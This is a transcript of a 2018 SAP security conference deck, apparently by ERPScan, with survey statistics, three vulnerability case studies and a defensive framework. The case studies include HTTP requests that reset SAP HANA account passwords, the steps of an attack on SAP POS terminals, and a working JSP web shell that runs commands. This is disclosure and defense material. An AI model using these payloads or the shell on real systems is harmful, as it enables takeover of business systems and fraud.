sap cybersecurity 2018 - erpscan · approach to sap security should change too. 1. world has...
TRANSCRIPT
SAP Cybersecurity 2018
2
Cyber attack kill chain
3
THE CHALLENGES WE FACE
4
• Network security• Web Application security• Endpoint security• Identity and access governance• Threat Detection and Incident response • Business application security
Just detecting/preventinginitial intrusion
that’s where a real attack happens
THE CISO RESPONSIBILITIES
5Approach to SAP security should change too
1. World has changed• increased connectivity
• boundless companies
2. SAP has changed• cloud and Mobile access from anywhere
• global platform rather than legacy tool
3. Attackers has changed• hackers are going up on application stack
• Every year we see a major incidents with SAP systems Source: ERP Cybersecurity Survey 2017
WHY
6
The story of a small SAP vulnerability
Source: Owner of USIS files for bankruptcy. The HeraldSource: USIS cuts more than 2,500 jobs after losing contracts in wake of cyberattack. The Washington Post
USIS DATA BREACH
7
ERP SECURITYQ: What are the most critical business applications?
Business Intelligence (BI/BW) 36% | Supply Chain Management 32% | Product Lifecycle Management (PLM) 30% | Enterprise Asset Management (EAM) 27% | Supplier Relationship Management (SRM) 18% | Manufacturing Execution System (MES) 18%
Q: What kind of Business applications are used in your company?
Source: ERP Cybersecurity Survey 2017
Source: Top New and Cool Technologies and Representative Vendors in Security, 2017. Gartner Risk Management Summit 2017 by Neil MacDonald
• Breach/Attack simulation• Digital supply chain, risk assessment services• Encryption by default, encryption everywhere• Anti-fraud/bot protection platforms (UI protection)• ERP-specific security/business-critical application security• Data flow discovery, monitoring and analytics• Bug bounty programs, crowdsourced and pen testing aaS• Cloud firewalls and UTMs for branch office and SOHO• ERP + EDR merger = advanced endpoint protection• IoT/OT discovery, visibility, monitoring and deception• SecOps chat
RADAR SCREEN – WHAT’S NEXT ON THE HORIZON?
9
HOW IMPORTANTCyberattacks on ERP
Source: ERP Cybersecurity Survey 2017
Q: How will the number of cyberattacks against ERP Systems change within the next 2-3 years?
SAP SECURITYWhy hacking SAP?
• EspionageTo steal financial or HR data, supplier and customer lists or disclose corporate secrets.
• Sabotage To cause denial of service, counterfeit financial records and accounting data, access technology network (SCADA).
• FraudTo carry out false transactions, modify master data.
10
11
SAP ATTACKHow much does it cost?
Source: ERP Cybersecurity Survey 2017
12
SAP SECURITYHow many vulnerabilities were found?
• 4000+ in all SAP products
• 2800+ in SAP NetWeaver ABAP based systems
• 1500+ in basic components which are the same in every system
• 400+ in ECC modules More details here: https://goo.gl/Hr144b
13
Q: Which of the following incidents related to SAP Security have you heard about most?
WHY DO ORGANIZATIONS LACK ERP SECURITY?
Source: ERP Cybersecurity Survey 2017
14
Q: Who will be responsible if your ERP System is breached?Who is the person most accountable if your organization has a SAP breach?
Source: Uncovering the Risks of SAP Cyber Breaches. Ponemon Institute Source: ERP Cybersecurity Survey 2017
RESPONSIBILITY
Vulnerabilities3 latest examples
16
Vulnerabilities 1:SAP HANA
17
User-Self-Service
• Available since SPS09 • Deactivated by default • Speed up the following processes:
o Forgotyourpassword? o Requestaccount
• Administrators must approve the accounts to activate them
USS
18
```POST /sap/hana/xs/selfService/user/selfService.xsjs
HTTP/1.1Host: <host>:<port>Content-Type: application/jsonX-Requested-With:XMLHttpRequestContent-Length: 137DNT: 1Connection: close
{"action":"createNewUser","username":"<username>","email":"<email>","x-sap-origin-location":""}```
Create new user attempt
• The user self-service tools of SAP HANA contain vulnerabilities. An unauthenticated user might be able to impersonate other users, including administrative accounts.
• An attacker needs a security token to reproduce this vulnerability. The attacker must send a request to create an user, and the server will send the security token via e-mail.
USS
19
• After the attacker receives the security token, he or she can change the password to any user with the following request
```POST /sap/hana/xs/selfService/user/selfService.xsjs HTTP/1.1Host: <host>:<port>Content-Type: application/jsonX-Requested-With: XMLHttpRequesConten-Lenght:DNT: 1Conection: close
{"pwd":"<pass>","confirmPwd":"<pass>","securitytoken":"<token>","securityQues":"1","securityAns":"{\"username\":\"SYSTEM\",\"time\":\"2020-01-10T22:10:06,024Z\"}|","action":"savePassword"}````
• Changing any users password is possible with a combination of the two vulnerabilities• The attacker can inject additional variables into json request and json parser will parse and save them
into USS security storage• Additional variables will be injected in sql request without any checks from USS security storage.
Source code
USS
20
How to buy MacBook for $1Vulnerability 2:
21
Xpress Server
POS Client
POS client
22
Xpress Server
POS Client
POS client
23
Xpress Server
POS Client
POS client
24
25
Xpress Server
POS client
26
1. Store configurator creates config files and Xpress Server will apply them, if it finds a ”newparm.trg” file in the special directory.
2. We can write any data we want in any file on Xpress Server using port 2200.
3. POS Clients (Terminals) update their parameters after opening.4. We can close and open POS Terminals using telnet and port 2202.
4 FACTS ABOUT SAP POSCAN HELP US MAKE A TRICK
27
Attacker Xpress Server
POS Client
PORT 2202
Database
PORT 2200
28
Attacker Xpress Server
POS Client
PORT 2202
PORT 2200
1 Evil Configuration files
Database
29
Attacker Xpress Server
POS Client
PORT 2202
PORT 2200
1 Evil Configuration files
2 Trigger file ”newparm.trg”
Database
30
Attacker Xpress Server
POS Client
PORT 2202
PORT 2200
1 Evil Configuration files
2 Trigger file ”newparm.trg”
3 Apply new settings
Database
31
Attacker Xpress Server
POS Client
PORT 2202
PORT 2200
1 Evil Configuration files
2 Trigger file ”newparm.trg”
3 Apply new settings
4 Write some of them in database
Database
32
Attacker Xpress Server
POS Client
PORT 2202
PORT 2200
1 Evil Configuration files
2 Trigger file ”newparm.trg”
3 Apply new settings
4 Write some of them in database
5 Close Terminal
Database
33
Attacker Xpress Server
POS Client
PORT 2202
PORT 2200
1 Evil Configuration files
2 Trigger file ”newparm.trg”
3 Apply new settings
4 Write some of them in database
5 Close Terminal
6 Close Terminal
Database
34
Attacker Xpress Server
POS Client
PORT 2202
PORT 2200
1 Evil Configuration files
2 Trigger file ”newparm.trg”
3 Apply new settings
4 Write some of them in database
5 Close Terminal
6 Close Terminal
7 Open Terminal
Database
35
Attacker Xpress Server
POS Client
PORT 2202
PORT 2200
1 Evil Configuration files
2 Trigger file ”newparm.trg”
3 Apply new settings
4 Write some of them in database
5 Close Terminal
6 Close Terminal
7 Open Terminal
8 Open Terminal
Database
36
Attacker Xpress Server
POS Client
PORT 2202
PORT 2200
1 Evil Configuration files
2 Trigger file ”newparm.trg”
3 Apply new settings
4 Write some of them in database
5 Close Terminal
6 Close Terminal
7 Open Terminal
8 Open Terminal
9 Get evil Configuration files
Database
37
Attacker Xpress Server
POS Client
PORT 2202
PORT 2200
1 Evil Configuration files
2 Trigger file ”newparm.trg”
3 Apply new settings
4 Write some of them in database
5 Close Terminal
6 Close Terminal
7 Open Terminal
8 Open Terminal
9 Get evil Configuration files
Database
38
How to steal all CRM accountsVulnerability 2:
39
One of the thousands
SAP REDWOOD APP
40
Source code
SAP REDWOOD APP
41
Directory traversal
REDWOOD APP
42
CRM ADMIN CONSOLE
43
CRM LOGGING CONFIGURATION
44
Typical .jsp shell<%@ page import="java.util.*,java.io.*"%><% if (request.getParameter("cmd") != null){
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); out.println ("<PRE>");while ( disr != null ) {
out.println(disr);disr = dis.readLine();
}out.println ("</PRE>");
} %>
EXAMPLE OF EVIL CODE
45
By sending http request
WRITING EVIL CODE
46
THE EVIL CODE IN THE LOG FILE
47
With help of evil code
COMMAND EXECUTION
StatisticsThe most vulnerable industries
49
46%
MOST VULNERABLE INDUSTRIES
30% 15%• An average company using SAP has 35% of security parameters configured unsafely• Manufacturing companies fail in Patch Management: more then 40% do not implement SAP Security Notes• IT industry fails in encryption: 90% of companies do not implement SSL/SNC for RFC connections
50
MOST VULNERABLE COMPONENTS
MESSAGE SERVERGateway(35% companies)
MMC(45% companies)
Host Control(5% companies)
Enqueue(13% companies)
>70% COMPANIES HAS CRITICAL VULNS
51
USER SECURITY
Profile:• ~ 55 users has SAP_ALL profile assigned• ~ 20 RFCs use default users
(SAPCPIC, TMSADM, EARLYWATCH, …)
Passwords:• 10% of passwords vulnerable to dictionary attacks• In most systems default length is 6 chars• 91% Oil & Gas companies didn’t configure
complexity requirements at all• 63% of all companies allow never expiring passwords
2&
23&
32&
54&
SAP* DDIC TMSADM SAPCPIC
% systems with default passwords
In audits we’ve found at least one SAP system with default users/passwords!99%
52
HTTPS:
ENCRYPTION
83%
P4SEC: NEVER!
SNC: 37%! 90% of IT companies
don't use encryption to protect RFC at all
Only in 3% of all cases SAP system validate clients' certificates
53
SAP ABAP Security Audit Log
LOGGINGUser actions: logons, access to reports and tables, executions of transactions
SAP ABAP HTTP logs(ICM/MS/WebDispatcher)
Attacks: SQL Injection, XSS, XXE, RCE, DoS, Directory Traversal…
Enabled in 57% systems
Gateway Network actions, RFC actions, dynamic parameter changes
Maximum audit log file size is less then
ICM: enabled in 38% systems
MS: enabled in 27% systems
WD: enabled in 23% systems
Enabled in 15% systems
200M
Enable all logs, set big enough file size (~2 Gb), archive and rotate logs
54
RECOMMENDATIONSOil & Gas, Energy, Manufacturing industries adapt slowly:
• Delayed patching• Lack of staff trained in security• Deluded SCADA systems are isolated from ERP systems
All:• Lack of control• Default users/passwords• Disabled logs
IT & Finance industry:• No encryption• Custom development• Everchanging landscape
Pentest them to convince the management implement security controls
Monitor user actions and systems’ behaviour
Scan systems’ security configurations
DefenseBusiness Case for SAP Cybersecurity Framework
56
CURRENT STATE
CISO
CIO
PATCHING SAP SYSTEMS
SAP BASIS
SAP SECURITY
SEGREGATION OF DUTIES
IT OPERATIONS
MONITORING SAP SYSTEMS
ENTERPRISE SECURITY
VULNERABILITY MANAGEMENT
LACK OF EFFECTIVE OVERSIGHT
LACK OF VISIBILITY
COMPLEXITYPOOR
INTEGRATION
SLIPPED THROUGH THE CRACKS
57
FUTURE STATECISO CIO
ENTERPRISE SECURITY
Vulnerability Management+ Asset Management+ Risk Management+ Secure Development
SAP BASIS
Patching SAP systems+ Incident Response+ Mitigation+ Improvements
SAP SECURITY
Segregation Of Duties+ Data Security+ Secure Architecture+ Awareness and Training
IT OPERATIONS
Monitoring SAP systems+ Threat Detection+ User Behavior+ Data Leakage
CRO
58
EAS-SEC
Gartner: Designing an Adaptive Security Architecture for Protection From Advanced AttacksSource: https://www.gartner.com/doc/2665515/
HISTORY
59
60
Category PREDICT
Process Secure Development
Purpose To ensure security during SAP systems development and acquisition.
Outcomes• Security Requirements• Development Standards and Processes• Security Plans
Implementation steps
1. Develop basic security requirements to configuration of servers, networks, SAP applications and client stations
2. Create secure development standards and processes3. Automate secure development processes
SAP CYBERSECURITY FRAMEWORK
61
50%
80% 99%
3-6 months
6-12 months 12 months
23
IMPLEMENTATION TIERS
1
62
SAP Cybersecurity Framework
Security Program
Security Policies
Security Plans
Process Descriptions
Technical Solutions
BENEFITS
PREDICTUnderstand SAP environment
64
PREDICTProcess Purpose
Asset Management To communicate information about SAP assets, security category of the assets, rules of acceptable use and protection requirements
Business Environment To provide SAP business context, ensure cybersecurity continuity of SAP systems and address cybersecurity in supplier relationships
GovernanceTo develop cybersecurity policies, roles, responsibilities and procedures to ensure SAP cybersecurity is understood and integrated to organization operational and management processes
Vulnerability Management
To provide cybersecurity assurance in SAP systems by assessing vulnerabilities and reducing attack vectors
Risk Management To make decisions on addressing possible adverse impacts from the operation and use of SAP systems
Secure Development To ensure security during SAP systems development and acquisition
65
VULNERABILITY MANAGEMENT
Regularly perform SAP security audits and penetration tests
Repeatedly scan SAP systems for vulnerabilities, recommend and track remediations
Monitor vulnerabilities, remediations and threats online from public and private sources and threat intelligence feeds
Implementation: Outcomes:
Purpose: To provide cybersecurity assurance in SAP systems by assessing vulnerabilities and reducing attack vectors
1
2
3
• Scan Plans
• Scan Profiles
• Remediation Plans
PREVENTReduce the surface area of attack
67
PREVENT
Process Purpose
Access Control To limit rights of authorized users and prevent unauthorized use of an SAP system
Awareness and Training To provide personnel and contractors cybersecurity awareness education and trainings to perform their duties and responsibilities
Data Security To enforce requirements to confidentiality, integrity and availability of information in SAP systems on the data layer
Secure Architecture To ensure security of all SAP solutions through-out all SAP components, connections, infrastructure and security controls
68
ACCESS CONTROL
Access Rules
Access Mechanisms
Access Control Reports
Secure the network, servers and endpoint devices
Implement role-based access control to SAP functionality
Enforce Segregation of Duties controls according to business process rules
Implementation: Outcomes:
Purpose: To limit rights of authorized users and prevent unauthorized use of an SAP system
1
2
3
69
ACCESS CONTROL. HOW TO CREATE A USER?
Ways to create a user in SAP system:1. Transaction SU01
2. Database table USR02
3. RFC function BAPI_USER_CREATE
4. Web exploit using InvokerServlet feature and CTC servlet
Number of objects:1. More then 300 000 transactions
2. More then 500 000 tables
3. More then 40 000 RFC functions
4. 500 known web exploits
DETECTMonitor threats
71
DETECT
Process Purpose
Event Management To collect information on SAP security related events
Threat Detection To detect attacks and possible threats to SAP systems
User Behavior To detect deviations of user behavior from typical in SAP systems
Data Leakage To detect data leakages in SAP systems
72
EVENT MANAGEMENT. EVENT SOURCES
o SAP ABAP Security logo SAP ABAP Audit logo SAP ABAP HTTP logo SAP ABAP ICM Security logo SAP ABAP RFC logo SAP J2EE HTTP logo SAP HANA Security logo SAP HANA log
More than 30 logs
Log Management Solutions
73
THREAT DETECTION
• Threat Catalogue
• Threat Data Sources
• Threat Detection Rules
Implementation: Outcomes:
Purpose: To detect attacks and possible threats to SAP systems
1
2
3
Configure IDS/IPS systems to detect SAP attack signatures
Manually review SAP security events
Monitor potential attacks, security event combinations and anomalies
RESPONDInvestigate, take actions and improve
75
RESPOND
Process Purpose
Incident Response To systematically respond to violation or threat of violation of SAP security policies and practices
Clear Communications To establish structure for SAP security responsibility in a business and provide means for clear communications between its members
Continuous Analysis To continuously monitor effectiveness of SAP security processes and provide insights into state of SAP security
Mitigation To design and model changes to security of SAP systems
Improvements To learn from external events and internal assessments of SAP security controls
76
MITIGATION. VIRTUAL PATCHING
77
77
THANK YOU
USA:228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301Phone 650.798.5255
EU:Luna ArenA 238 Herikerbergweg, 1101 CM AmsterdamPhone +31 20 8932892
EU:Štětkova 1638/18, Prague 4 - Nusle,
140 00, Czech Republic
Read our blogerpscan.com/category/press-center/blog/
Join our webinarserpscan.com/category/press-center/events/
Subscribe to our newsletterseepurl.com/bef7h1
Alexander PolyakovCTO, [email protected]
78